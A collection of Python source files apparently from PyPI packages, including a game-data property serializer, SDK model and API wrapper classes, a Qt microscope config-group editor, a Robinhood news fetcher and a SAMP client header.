/retro_data_structures-0.23.0-py3-none-any.whl/retro_data_structures/properties/dkc_returns/archetypes/ZoomBehaviorData.py
|
import dataclasses
import struct
import typing
from retro_data_structures.game_check import Game
from retro_data_structures.properties.base_property import BaseProperty
import retro_data_structures.enums.dkc_returns as enums
from retro_data_structures.properties.dkc_returns.archetypes.Convergence import Convergence
from retro_data_structures.properties.dkc_returns.core.Spline import Spline
@dataclasses.dataclass()
class ZoomBehaviorData(BaseProperty):
pullback_spline: Spline = dataclasses.field(default_factory=Spline)
zoom_by_horizontal_distance: bool = dataclasses.field(default=True)
zoom_by_vertical_distance: bool = dataclasses.field(default=False)
vertical_distance_ratio: float = dataclasses.field(default=1.7769999504089355)
zoom_by_distance_from_ground: bool = dataclasses.field(default=False)
pullback_spline_from_ground: Spline = dataclasses.field(default_factory=Spline)
adjust_horizontally: bool = dataclasses.field(default=True)
adjust_vertically: bool = dataclasses.field(default=True)
zoom_in_delay: float = dataclasses.field(default=1.5)
zoom_motion: Convergence = dataclasses.field(default_factory=Convergence)
horizontal_adjust_motion: Convergence = dataclasses.field(default_factory=Convergence)
get_max_zoom_from_zoom_spline: bool = dataclasses.field(default=False)
max_distance_from_target: float = dataclasses.field(default=30.5)
@classmethod
def game(cls) -> Game:
return Game.DKC_RETURNS
@classmethod
def from_stream(cls, data: typing.BinaryIO, size: typing.Optional[int] = None, default_override: typing.Optional[dict] = None):
property_count = struct.unpack(">H", data.read(2))[0]
present_fields = default_override or {}
for _ in range(property_count):
property_id, property_size = struct.unpack(">LH", data.read(6))
start = data.tell()
try:
property_name, decoder = _property_decoder[property_id]
present_fields[property_name] = decoder(data, property_size)
except KeyError:
raise RuntimeError(f"Unknown property: 0x{property_id:08x}")
assert data.tell() - start == property_size
return cls(**present_fields)
def to_stream(self, data: typing.BinaryIO, default_override: typing.Optional[dict] = None):
default_override = default_override or {}
data.write(b'\x00\r') # 13 properties
data.write(b'4:\x18\xa7') # 0x343a18a7
before = data.tell()
data.write(b'\x00\x00') # size placeholder
self.pullback_spline.to_stream(data)
after = data.tell()
data.seek(before)
data.write(struct.pack(">H", after - before - 2))
data.seek(after)
data.write(b'\x82\xaf7\x1e') # 0x82af371e
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.zoom_by_horizontal_distance))
data.write(b'ov\xec^') # 0x6f76ec5e
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.zoom_by_vertical_distance))
data.write(b'm\x18\xc3\x18') # 0x6d18c318
data.write(b'\x00\x04') # size
data.write(struct.pack('>f', self.vertical_distance_ratio))
data.write(b'\xac\xe2:\xc6') # 0xace23ac6
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.zoom_by_distance_from_ground))
data.write(b'-\x83\x9eo') # 0x2d839e6f
before = data.tell()
data.write(b'\x00\x00') # size placeholder
self.pullback_spline_from_ground.to_stream(data)
after = data.tell()
data.seek(before)
data.write(struct.pack(">H", after - before - 2))
data.seek(after)
data.write(b'\xf8\x8d~\xf2') # 0xf88d7ef2
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.adjust_horizontally))
data.write(b'\x90n\x98\xfa') # 0x906e98fa
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.adjust_vertically))
data.write(b'\rl\x95)') # 0xd6c9529
data.write(b'\x00\x04') # size
data.write(struct.pack('>f', self.zoom_in_delay))
data.write(b'\t/\x7f\xd8') # 0x92f7fd8
before = data.tell()
data.write(b'\x00\x00') # size placeholder
self.zoom_motion.to_stream(data, default_override={'convergence_type': enums.ConvergenceType.Unknown1})
after = data.tell()
data.seek(before)
data.write(struct.pack(">H", after - before - 2))
data.seek(after)
data.write(b')\xe0b\x13') # 0x29e06213
before = data.tell()
data.write(b'\x00\x00') # size placeholder
self.horizontal_adjust_motion.to_stream(data)
after = data.tell()
data.seek(before)
data.write(struct.pack(">H", after - before - 2))
data.seek(after)
data.write(b'\xb2\x1eg\xc8') # 0xb21e67c8
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.get_max_zoom_from_zoom_spline))
data.write(b'\x05O\x1a\x14') # 0x54f1a14
data.write(b'\x00\x04') # size
data.write(struct.pack('>f', self.max_distance_from_target))
@classmethod
def from_json(cls, data: dict):
    """Build an instance from its JSON-dict representation.

    Nested objects are rebuilt through their own ``from_json`` hooks;
    scalar fields are taken from the dict verbatim.
    """
    kwargs = {
        'pullback_spline': Spline.from_json(data['pullback_spline']),
        'zoom_by_horizontal_distance': data['zoom_by_horizontal_distance'],
        'zoom_by_vertical_distance': data['zoom_by_vertical_distance'],
        'vertical_distance_ratio': data['vertical_distance_ratio'],
        'zoom_by_distance_from_ground': data['zoom_by_distance_from_ground'],
        'pullback_spline_from_ground': Spline.from_json(data['pullback_spline_from_ground']),
        'adjust_horizontally': data['adjust_horizontally'],
        'adjust_vertically': data['adjust_vertically'],
        'zoom_in_delay': data['zoom_in_delay'],
        'zoom_motion': Convergence.from_json(data['zoom_motion']),
        'horizontal_adjust_motion': Convergence.from_json(data['horizontal_adjust_motion']),
        'get_max_zoom_from_zoom_spline': data['get_max_zoom_from_zoom_spline'],
        'max_distance_from_target': data['max_distance_from_target'],
    }
    return cls(**kwargs)
def to_json(self) -> dict:
    """Serialize this object to a JSON-compatible dict.

    Nested objects are serialized via their own ``to_json`` hooks;
    scalar fields are emitted as-is.
    """
    return dict(
        pullback_spline=self.pullback_spline.to_json(),
        zoom_by_horizontal_distance=self.zoom_by_horizontal_distance,
        zoom_by_vertical_distance=self.zoom_by_vertical_distance,
        vertical_distance_ratio=self.vertical_distance_ratio,
        zoom_by_distance_from_ground=self.zoom_by_distance_from_ground,
        pullback_spline_from_ground=self.pullback_spline_from_ground.to_json(),
        adjust_horizontally=self.adjust_horizontally,
        adjust_vertically=self.adjust_vertically,
        zoom_in_delay=self.zoom_in_delay,
        zoom_motion=self.zoom_motion.to_json(),
        horizontal_adjust_motion=self.horizontal_adjust_motion.to_json(),
        get_max_zoom_from_zoom_spline=self.get_max_zoom_from_zoom_spline,
        max_distance_from_target=self.max_distance_from_target,
    )
def _decode_pullback_spline(data: typing.BinaryIO, property_size: int):
    # Delegate to the Spline reader, which consumes the property payload.
    return Spline.from_stream(data, property_size)


def _decode_zoom_by_horizontal_distance(data: typing.BinaryIO, property_size: int):
    # Big-endian bool, one byte.
    (value,) = struct.unpack('>?', data.read(1))
    return value


def _decode_zoom_by_vertical_distance(data: typing.BinaryIO, property_size: int):
    (value,) = struct.unpack('>?', data.read(1))
    return value


def _decode_vertical_distance_ratio(data: typing.BinaryIO, property_size: int):
    # Big-endian 32-bit float.
    (value,) = struct.unpack('>f', data.read(4))
    return value


def _decode_zoom_by_distance_from_ground(data: typing.BinaryIO, property_size: int):
    (value,) = struct.unpack('>?', data.read(1))
    return value


def _decode_pullback_spline_from_ground(data: typing.BinaryIO, property_size: int):
    return Spline.from_stream(data, property_size)


def _decode_adjust_horizontally(data: typing.BinaryIO, property_size: int):
    (value,) = struct.unpack('>?', data.read(1))
    return value


def _decode_adjust_vertically(data: typing.BinaryIO, property_size: int):
    (value,) = struct.unpack('>?', data.read(1))
    return value


def _decode_zoom_in_delay(data: typing.BinaryIO, property_size: int):
    (value,) = struct.unpack('>f', data.read(4))
    return value


def _decode_zoom_motion(data: typing.BinaryIO, property_size: int):
    # This property overrides the default convergence type when read.
    return Convergence.from_stream(data, property_size, default_override={'convergence_type': enums.ConvergenceType.Unknown1})


def _decode_horizontal_adjust_motion(data: typing.BinaryIO, property_size: int):
    return Convergence.from_stream(data, property_size)


def _decode_get_max_zoom_from_zoom_spline(data: typing.BinaryIO, property_size: int):
    (value,) = struct.unpack('>?', data.read(1))
    return value


def _decode_max_distance_from_target(data: typing.BinaryIO, property_size: int):
    (value,) = struct.unpack('>f', data.read(4))
    return value
# Dispatch table: property ID (presumably a hash of the property name —
# not verifiable from this file) -> (attribute name, decoder callable).
# Each decoder receives the stream positioned at the property payload and
# the payload size in bytes.
_property_decoder: typing.Dict[int, typing.Tuple[str, typing.Callable[[typing.BinaryIO, int], typing.Any]]] = {
    0x343a18a7: ('pullback_spline', _decode_pullback_spline),
    0x82af371e: ('zoom_by_horizontal_distance', _decode_zoom_by_horizontal_distance),
    0x6f76ec5e: ('zoom_by_vertical_distance', _decode_zoom_by_vertical_distance),
    0x6d18c318: ('vertical_distance_ratio', _decode_vertical_distance_ratio),
    0xace23ac6: ('zoom_by_distance_from_ground', _decode_zoom_by_distance_from_ground),
    0x2d839e6f: ('pullback_spline_from_ground', _decode_pullback_spline_from_ground),
    0xf88d7ef2: ('adjust_horizontally', _decode_adjust_horizontally),
    0x906e98fa: ('adjust_vertically', _decode_adjust_vertically),
    0xd6c9529: ('zoom_in_delay', _decode_zoom_in_delay),
    0x92f7fd8: ('zoom_motion', _decode_zoom_motion),
    0x29e06213: ('horizontal_adjust_motion', _decode_horizontal_adjust_motion),
    0xb21e67c8: ('get_max_zoom_from_zoom_spline', _decode_get_max_zoom_from_zoom_spline),
    0x54f1a14: ('max_distance_from_target', _decode_max_distance_from_target),
}
|
PypiClean
|
/fds.sdk.FactSetEstimates-1.1.1-py3-none-any.whl/fds/sdk/FactSetEstimates/models/__init__.py
|
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from fds.sdk.FactSetEstimates.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from fds.sdk.FactSetEstimates.model.category import Category
from fds.sdk.FactSetEstimates.model.consensus_estimate import ConsensusEstimate
from fds.sdk.FactSetEstimates.model.consensus_ratings import ConsensusRatings
from fds.sdk.FactSetEstimates.model.consensus_ratings_request import ConsensusRatingsRequest
from fds.sdk.FactSetEstimates.model.consensus_ratings_response import ConsensusRatingsResponse
from fds.sdk.FactSetEstimates.model.consensus_response import ConsensusResponse
from fds.sdk.FactSetEstimates.model.detail_estimate import DetailEstimate
from fds.sdk.FactSetEstimates.model.detail_ratings import DetailRatings
from fds.sdk.FactSetEstimates.model.detail_ratings_request import DetailRatingsRequest
from fds.sdk.FactSetEstimates.model.detail_ratings_response import DetailRatingsResponse
from fds.sdk.FactSetEstimates.model.detail_response import DetailResponse
from fds.sdk.FactSetEstimates.model.error_response import ErrorResponse
from fds.sdk.FactSetEstimates.model.error_response_sub_errors import ErrorResponseSubErrors
from fds.sdk.FactSetEstimates.model.fixed_consensus_request import FixedConsensusRequest
from fds.sdk.FactSetEstimates.model.fixed_detail_request import FixedDetailRequest
from fds.sdk.FactSetEstimates.model.frequency import Frequency
from fds.sdk.FactSetEstimates.model.ids import Ids
from fds.sdk.FactSetEstimates.model.metric import Metric
from fds.sdk.FactSetEstimates.model.metrics import Metrics
from fds.sdk.FactSetEstimates.model.metrics_request import MetricsRequest
from fds.sdk.FactSetEstimates.model.metrics_response import MetricsResponse
from fds.sdk.FactSetEstimates.model.periodicity import Periodicity
from fds.sdk.FactSetEstimates.model.periodicity_detail import PeriodicityDetail
from fds.sdk.FactSetEstimates.model.periodicity_surprise import PeriodicitySurprise
from fds.sdk.FactSetEstimates.model.rolling_consensus_request import RollingConsensusRequest
from fds.sdk.FactSetEstimates.model.rolling_detail_request import RollingDetailRequest
from fds.sdk.FactSetEstimates.model.segment_ids import SegmentIds
from fds.sdk.FactSetEstimates.model.segment_type import SegmentType
from fds.sdk.FactSetEstimates.model.segments_estimate import SegmentsEstimate
from fds.sdk.FactSetEstimates.model.segments_request import SegmentsRequest
from fds.sdk.FactSetEstimates.model.segments_response import SegmentsResponse
from fds.sdk.FactSetEstimates.model.statistic import Statistic
from fds.sdk.FactSetEstimates.model.subcategory import Subcategory
from fds.sdk.FactSetEstimates.model.surprise import Surprise
from fds.sdk.FactSetEstimates.model.surprise_request import SurpriseRequest
from fds.sdk.FactSetEstimates.model.surprise_response import SurpriseResponse
|
PypiClean
|
/trackian-homebew-facebook-business-14.0.0.tar.gz/trackian-homebew-facebook-business-14.0.0/facebook_business/adobjects/pagecalltoaction.py
|
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from facebook_business.adobjects.abstractobject import AbstractObject
from facebook_business.adobjects.abstractcrudobject import AbstractCrudObject
from facebook_business.adobjects.objectparser import ObjectParser
from facebook_business.api import FacebookRequest
from facebook_business.typechecker import TypeChecker
"""
This class is auto-generated.
For any issues or feature requests related to this class, please let us know on
github and we'll fix in our codegen framework. We'll not be able to accept
pull request for this class.
"""
class PageCallToAction(
    AbstractCrudObject,
):
    """CRUD wrapper for the Graph API PageCallToAction node.

    Auto-generated binding (see the module docstring above); the nested
    ``Field`` and enum classes mirror the Graph API schema and should not
    be edited by hand.
    """

    def __init__(self, fbid=None, parent_id=None, api=None):
        self._isPageCallToAction = True
        super(PageCallToAction, self).__init__(fbid, parent_id, api)

    class Field(AbstractObject.Field):
        # Graph API field names exposed on this node.
        android_app = 'android_app'
        android_deeplink = 'android_deeplink'
        android_destination_type = 'android_destination_type'
        android_package_name = 'android_package_name'
        android_url = 'android_url'
        created_time = 'created_time'
        email_address = 'email_address'
        # 'from' is a Python keyword, hence the field_from alias.
        field_from = 'from'
        id = 'id'
        intl_number_with_plus = 'intl_number_with_plus'
        iphone_app = 'iphone_app'
        iphone_deeplink = 'iphone_deeplink'
        iphone_destination_type = 'iphone_destination_type'
        iphone_url = 'iphone_url'
        status = 'status'
        type = 'type'
        updated_time = 'updated_time'
        web_destination_type = 'web_destination_type'
        web_url = 'web_url'

    class AndroidDestinationType:
        app_deeplink = 'APP_DEEPLINK'
        become_a_volunteer = 'BECOME_A_VOLUNTEER'
        email = 'EMAIL'
        facebook_app = 'FACEBOOK_APP'
        follow = 'FOLLOW'
        marketplace_inventory_page = 'MARKETPLACE_INVENTORY_PAGE'
        menu_on_facebook = 'MENU_ON_FACEBOOK'
        messenger = 'MESSENGER'
        mini_shop = 'MINI_SHOP'
        mobile_center = 'MOBILE_CENTER'
        none = 'NONE'
        phone_call = 'PHONE_CALL'
        shop_on_facebook = 'SHOP_ON_FACEBOOK'
        website = 'WEBSITE'

    class IphoneDestinationType:
        app_deeplink = 'APP_DEEPLINK'
        become_a_volunteer = 'BECOME_A_VOLUNTEER'
        email = 'EMAIL'
        facebook_app = 'FACEBOOK_APP'
        follow = 'FOLLOW'
        marketplace_inventory_page = 'MARKETPLACE_INVENTORY_PAGE'
        menu_on_facebook = 'MENU_ON_FACEBOOK'
        messenger = 'MESSENGER'
        mini_shop = 'MINI_SHOP'
        none = 'NONE'
        phone_call = 'PHONE_CALL'
        shop_on_facebook = 'SHOP_ON_FACEBOOK'
        website = 'WEBSITE'

    class Type:
        become_a_volunteer = 'BECOME_A_VOLUNTEER'
        book_appointment = 'BOOK_APPOINTMENT'
        book_now = 'BOOK_NOW'
        buy_tickets = 'BUY_TICKETS'
        call_now = 'CALL_NOW'
        charity_donate = 'CHARITY_DONATE'
        contact_us = 'CONTACT_US'
        donate_now = 'DONATE_NOW'
        email = 'EMAIL'
        follow_page = 'FOLLOW_PAGE'
        get_directions = 'GET_DIRECTIONS'
        get_offer = 'GET_OFFER'
        get_offer_view = 'GET_OFFER_VIEW'
        interested = 'INTERESTED'
        learn_more = 'LEARN_MORE'
        listen = 'LISTEN'
        local_dev_platform = 'LOCAL_DEV_PLATFORM'
        message = 'MESSAGE'
        mobile_center = 'MOBILE_CENTER'
        open_app = 'OPEN_APP'
        order_food = 'ORDER_FOOD'
        play_music = 'PLAY_MUSIC'
        play_now = 'PLAY_NOW'
        purchase_gift_cards = 'PURCHASE_GIFT_CARDS'
        request_appointment = 'REQUEST_APPOINTMENT'
        request_quote = 'REQUEST_QUOTE'
        shop_now = 'SHOP_NOW'
        shop_on_facebook = 'SHOP_ON_FACEBOOK'
        sign_up = 'SIGN_UP'
        view_inventory = 'VIEW_INVENTORY'
        view_menu = 'VIEW_MENU'
        view_shop = 'VIEW_SHOP'
        visit_group = 'VISIT_GROUP'
        watch_now = 'WATCH_NOW'
        woodhenge_support = 'WOODHENGE_SUPPORT'

    class WebDestinationType:
        become_a_volunteer = 'BECOME_A_VOLUNTEER'
        become_supporter = 'BECOME_SUPPORTER'
        email = 'EMAIL'
        follow = 'FOLLOW'
        messenger = 'MESSENGER'
        mobile_center = 'MOBILE_CENTER'
        none = 'NONE'
        shop_on_facebook = 'SHOP_ON_FACEBOOK'
        website = 'WEBSITE'

    def api_delete(self, fields=None, params=None, batch=None, success=None, failure=None, pending=False):
        """Issue a DELETE request against this node (or queue it on a batch)."""
        from facebook_business.utils import api_utils
        if batch is None and (success is not None or failure is not None):
            api_utils.warning('`success` and `failure` callback only work for batch call.')
        param_types = {
        }
        enums = {
        }
        request = FacebookRequest(
            node_id=self['id'],
            method='DELETE',
            endpoint='/',
            api=self._api,
            param_checker=TypeChecker(param_types, enums),
            target_class=AbstractCrudObject,
            api_type='NODE',
            response_parser=ObjectParser(reuse_object=self),
        )
        request.add_params(params)
        request.add_fields(fields)
        if batch is not None:
            request.add_to_batch(batch, success=success, failure=failure)
            return request
        elif pending:
            return request
        else:
            self.assure_call()
            return request.execute()

    def api_get(self, fields=None, params=None, batch=None, success=None, failure=None, pending=False):
        """Issue a GET request for this node (or queue it on a batch)."""
        from facebook_business.utils import api_utils
        if batch is None and (success is not None or failure is not None):
            api_utils.warning('`success` and `failure` callback only work for batch call.')
        param_types = {
        }
        enums = {
        }
        request = FacebookRequest(
            node_id=self['id'],
            method='GET',
            endpoint='/',
            api=self._api,
            param_checker=TypeChecker(param_types, enums),
            target_class=PageCallToAction,
            api_type='NODE',
            response_parser=ObjectParser(reuse_object=self),
        )
        request.add_params(params)
        request.add_fields(fields)
        if batch is not None:
            request.add_to_batch(batch, success=success, failure=failure)
            return request
        elif pending:
            return request
        else:
            self.assure_call()
            return request.execute()

    def api_update(self, fields=None, params=None, batch=None, success=None, failure=None, pending=False):
        """Issue a POST (update) request for this node (or queue it on a batch)."""
        from facebook_business.utils import api_utils
        if batch is None and (success is not None or failure is not None):
            api_utils.warning('`success` and `failure` callback only work for batch call.')
        param_types = {
            'android_app_id': 'int',
            'android_destination_type': 'android_destination_type_enum',
            'android_package_name': 'string',
            'android_url': 'string',
            'email_address': 'string',
            'intl_number_with_plus': 'string',
            'iphone_app_id': 'int',
            'iphone_destination_type': 'iphone_destination_type_enum',
            'iphone_url': 'string',
            'type': 'type_enum',
            'web_destination_type': 'web_destination_type_enum',
            'web_url': 'string',
        }
        enums = {
            'android_destination_type_enum': PageCallToAction.AndroidDestinationType.__dict__.values(),
            'iphone_destination_type_enum': PageCallToAction.IphoneDestinationType.__dict__.values(),
            'type_enum': PageCallToAction.Type.__dict__.values(),
            'web_destination_type_enum': PageCallToAction.WebDestinationType.__dict__.values(),
        }
        request = FacebookRequest(
            node_id=self['id'],
            method='POST',
            endpoint='/',
            api=self._api,
            param_checker=TypeChecker(param_types, enums),
            target_class=PageCallToAction,
            api_type='NODE',
            response_parser=ObjectParser(reuse_object=self),
        )
        request.add_params(params)
        request.add_fields(fields)
        if batch is not None:
            request.add_to_batch(batch, success=success, failure=failure)
            return request
        elif pending:
            return request
        else:
            self.assure_call()
            return request.execute()

    # Declared Graph API field -> type-name mapping used by the SDK's parser.
    _field_types = {
        'android_app': 'Application',
        'android_deeplink': 'string',
        'android_destination_type': 'string',
        'android_package_name': 'string',
        'android_url': 'string',
        'created_time': 'datetime',
        'email_address': 'string',
        'from': 'Page',
        'id': 'string',
        'intl_number_with_plus': 'string',
        'iphone_app': 'Application',
        'iphone_deeplink': 'string',
        'iphone_destination_type': 'string',
        'iphone_url': 'string',
        'status': 'string',
        'type': 'string',
        'updated_time': 'datetime',
        'web_destination_type': 'string',
        'web_url': 'string',
    }

    @classmethod
    def _get_field_enum_info(cls):
        """Return the enum value sets declared on this class, keyed by enum name."""
        field_enum_info = {}
        field_enum_info['AndroidDestinationType'] = PageCallToAction.AndroidDestinationType.__dict__.values()
        field_enum_info['IphoneDestinationType'] = PageCallToAction.IphoneDestinationType.__dict__.values()
        field_enum_info['Type'] = PageCallToAction.Type.__dict__.values()
        field_enum_info['WebDestinationType'] = PageCallToAction.WebDestinationType.__dict__.values()
        return field_enum_info
|
PypiClean
|
/pymmcore_widgets-0.4.2-py3-none-any.whl/pymmcore_widgets/_group_preset_widget/_edit_group_widget.py
|
from __future__ import annotations
from pymmcore_plus import CMMCorePlus
from qtpy.QtWidgets import (
QDialog,
QGroupBox,
QHBoxLayout,
QLabel,
QLineEdit,
QPushButton,
QSizePolicy,
QVBoxLayout,
QWidget,
)
from pymmcore_widgets._device_property_table import DevicePropertyTable
from pymmcore_widgets._device_type_filter import DeviceTypeFilters
from pymmcore_widgets._util import block_core
class EditGroupWidget(QDialog):
    """Dialog to edit which device properties belong to an existing config group.

    Parameters
    ----------
    group : str
        Name of the configuration group to edit. If the group does not exist
        in the core, the dialog is left un-initialized.
    parent : QWidget | None
        Optional Qt parent widget.
    """

    def __init__(self, group: str, *, parent: QWidget | None = None) -> None:
        super().__init__(parent=parent)
        self._mmc = CMMCorePlus.instance()
        self._group = group
        if self._group not in self._mmc.getAvailableConfigGroups():
            # Unknown group: nothing to edit, leave the dialog empty.
            return
        self._mmc.events.systemConfigurationLoaded.connect(self._update_filter)
        self._create_gui()
        self.group_lineedit.setText(self._group)
        # The group name is fixed while editing; only membership changes.
        self.group_lineedit.setEnabled(False)
        self.destroyed.connect(self._disconnect)

    def _create_gui(self) -> None:
        """Assemble the dialog: name row, property table, button row."""
        self.setWindowTitle(f"Edit the '{self._group}' Group.")
        main_layout = QVBoxLayout()
        main_layout.setSpacing(10)
        main_layout.setContentsMargins(10, 10, 10, 10)
        self.setLayout(main_layout)
        group_lineedit = self._create_group_lineedit_wdg()
        main_layout.addWidget(group_lineedit)
        table = self._create_table_wdg()
        main_layout.addWidget(table)
        btn = self._create_button_wdg()
        main_layout.addWidget(btn)

    def _create_group_lineedit_wdg(self) -> QGroupBox:
        """Create the 'Group name' row (label + line edit)."""
        wdg = QGroupBox()
        layout = QHBoxLayout()
        layout.setContentsMargins(5, 5, 5, 5)
        layout.setSpacing(10)
        wdg.setLayout(layout)
        group_lbl = QLabel(text="Group name:")
        group_lbl.setSizePolicy(
            QSizePolicy(QSizePolicy.Policy.Fixed, QSizePolicy.Policy.Fixed)
        )
        self.group_lineedit = QLineEdit()
        layout.addWidget(group_lbl)
        layout.addWidget(self.group_lineedit)
        return wdg

    def _create_table_wdg(self) -> QGroupBox:
        """Create the filterable device-property table with type filters."""
        wdg = QGroupBox()
        layout = QHBoxLayout()
        layout.setContentsMargins(5, 5, 5, 5)
        layout.setSpacing(0)
        wdg.setLayout(layout)
        self._filter_text = QLineEdit()
        self._filter_text.setClearButtonEnabled(True)
        self._filter_text.setPlaceholderText("Filter by device or property name...")
        self._filter_text.textChanged.connect(self._update_filter)
        self._prop_table = DevicePropertyTable(enable_property_widgets=False)
        self._prop_table.setRowsCheckable(True)
        # Pre-check the properties already belonging to this group.
        self._prop_table.checkGroup(self._group)
        self._device_filters = DeviceTypeFilters()
        self._device_filters.filtersChanged.connect(self._update_filter)
        self._device_filters.setShowReadOnly(False)
        self._device_filters._read_only_checkbox.hide()
        right = QWidget()
        right.setLayout(QVBoxLayout())
        right.layout().addWidget(self._filter_text)
        right.layout().addWidget(self._prop_table)
        left = QWidget()
        left.setLayout(QVBoxLayout())
        left.layout().addWidget(self._device_filters)
        # BUG FIX: `left`/`right` were previously also added to the dialog's
        # top-level layout (self.layout()) before being re-added here, which
        # inserted each widget twice (the second add re-parents it). They
        # belong only in this group box's layout.
        layout.addWidget(left)
        layout.addWidget(right)
        return wdg

    def _create_button_wdg(self) -> QWidget:
        """Create the info label + 'Modify Group' button row."""
        wdg = QWidget()
        layout = QHBoxLayout()
        layout.setContentsMargins(0, 0, 0, 0)
        layout.setSpacing(0)
        wdg.setLayout(layout)
        self.info_lbl = QLabel()
        self.modify_group_btn = QPushButton(text="Modify Group")
        self.modify_group_btn.setSizePolicy(
            QSizePolicy(QSizePolicy.Policy.Fixed, QSizePolicy.Policy.Fixed)
        )
        self.modify_group_btn.clicked.connect(self._add_group)
        layout.addWidget(self.info_lbl)
        layout.addWidget(self.modify_group_btn)
        return wdg

    def _disconnect(self) -> None:
        """Detach core signal handlers when the dialog is destroyed."""
        self._mmc.events.systemConfigurationLoaded.disconnect(self._update_filter)

    def _update_filter(self) -> None:
        """Re-apply the text filter and device-type filters to the table."""
        filt = self._filter_text.text().lower()
        self._prop_table.filterDevices(
            filt, self._device_filters.filters(), self._device_filters.showReadOnly()
        )

    def _add_group(self) -> None:
        """Rebuild the group so every preset matches the checked properties.

        Kept (device, property) pairs retain their per-preset values; newly
        checked pairs are added to every preset with the device's current
        value; unchecked pairs are dropped.
        """
        # [(device, property, value), ...], need to remove the value
        new_dev_prop = [x[:2] for x in self._prop_table.getCheckedProperties()]
        presets = self._mmc.getAvailableConfigs(self._group)
        preset_dev_prop = [
            (k[0], k[1]) for k in self._mmc.getConfigData(self._group, presets[0])
        ]
        if preset_dev_prop == new_dev_prop:
            # Membership unchanged: nothing to do.
            return
        # get any new dev prop to add to each preset
        _to_add: list[tuple[str, str, str]] = []
        for d, p in new_dev_prop:
            if (d, p) not in preset_dev_prop:
                value = self._mmc.getProperty(d, p)
                _to_add.append((d, p, value))
        # get the dev prop val to keep per preset
        _prop_to_keep: list[list[tuple[str, str, str]]] = []
        for preset in presets:
            preset_dev_prop_val = [
                (k[0], k[1], k[2]) for k in self._mmc.getConfigData(self._group, preset)
            ]
            _to_keep = [
                (d, p, v) for d, p, v in preset_dev_prop_val if (d, p) in new_dev_prop
            ]
            _prop_to_keep.append(_to_keep)
        # Recreate the group from scratch with the updated membership.
        self._mmc.deleteConfigGroup(self._group)
        for idx, preset in enumerate(presets):
            preset_dpv = _prop_to_keep[idx]
            if _to_add:
                preset_dpv.extend(_to_add)
            # Suppress the core's own signals while redefining, then emit
            # configDefined once per preset so listeners refresh.
            with block_core(self._mmc.events):
                for d, p, v in preset_dpv:
                    self._mmc.defineConfig(self._group, preset, d, p, v)
            self._mmc.events.configDefined.emit(self._group, preset, d, p, v)
        self.info_lbl.setText(f"'{self._group}' Group Modified.")
|
PypiClean
|
/ProsperDatareader-2.1.0-py3-none-any.whl/prosper/datareader/robinhood/news.py
|
import itertools
import warnings
import requests
from .. import config
from .. import exceptions
# Robinhood "midlands" news endpoint used by fetch_company_news_rh().
RH_NEWS = 'https://api.robinhood.com/midlands/news/'
# Default hard cap on pagination, to guarantee the fetch loop terminates.
PAGE_HARDBREAK = 50
def fetch_company_news_rh(
        ticker,
        page_limit=None,
        uri=RH_NEWS,
        _page_hardbreak=PAGE_HARDBREAK,  # FIXME?: does this need to move?
        logger=config.LOGGER
):
    """Parse the news feed from Robinhood, paging until exhausted or capped.

    Args:
        ticker (str): ticker for desired stock
        page_limit (int, optional): number of pages to fetch to cap results
        uri (str, optional): endpoint address
        _page_hardbreak (int, optional): error level for hard-capping limits
        logger (:obj:`logging.logger`, optional): logging handle

    Returns:
        (:obj:`list`): collection of news articles from robinhood

    Raises:
        requests.HTTPError: if any page request fails.

    Warns:
        exceptions.PaginationWarning: when the hard page cap is reached.
    """
    logger.info('fetching company_news for %s', ticker)
    page = itertools.count(start=1, step=1)
    articles_list = []
    while True:
        ## Generate request ##
        page_num = next(page)
        if page_num > _page_hardbreak:
            # BUG FIX: report the effective cap (the `_page_hardbreak`
            # argument) rather than the module constant it defaults to,
            # so the message stays correct when a caller overrides it.
            warnings.warn(
                'pagination limit {} reached'.format(_page_hardbreak),
                exceptions.PaginationWarning
            )
            break
        params = {
            'page': page_num,
            'symbol': ticker.upper()  #caps required
        }
        logger.info('--fetching page %s for %s from %s', page_num, ticker, uri)
        ## GET data ##
        req = requests.get(uri, params=params)
        req.raise_for_status()
        page_data = req.json()
        articles_list.extend(page_data['results'])
        ## Loop or quit ##
        if page_limit and page_num >= page_limit:
            logger.info('--reached page limit: %s:%s', page_num, page_limit)
            break
        if not page_data['next']:
            #NOTE: page_data['next'] does not yield a valid address. Manually step
            logger.info('--no more pages on endpoint %s', page_num)
            break
    return articles_list
|
PypiClean
|
/glue-samp-0.2.tar.gz/glue-samp-0.2/glue_samp/samp_client.py
|
from __future__ import print_function, division, absolute_import
import os
import uuid
import tempfile
from fnmatch import fnmatch
import numpy as np
try:
from astropy.samp import SAMPClientError, SAMPHubServer, SAMPIntegratedClient, SAMPHubError
except ImportError:
from astropy.vo.samp import SAMPClientError, SAMPHubServer, SAMPIntegratedClient, SAMPHubError
from glue import __version__ as glue_version
from glue.core import Data
from glue.logger import logger
from glue.core.data_factories.astropy_table import (astropy_tabular_data_votable,
astropy_tabular_data_fits)
from glue.core.data_factories.fits import fits_reader
from glue.core.data_exporters.gridded_fits import fits_writer
from glue.core.data_exporters.astropy_table import data_to_astropy_table
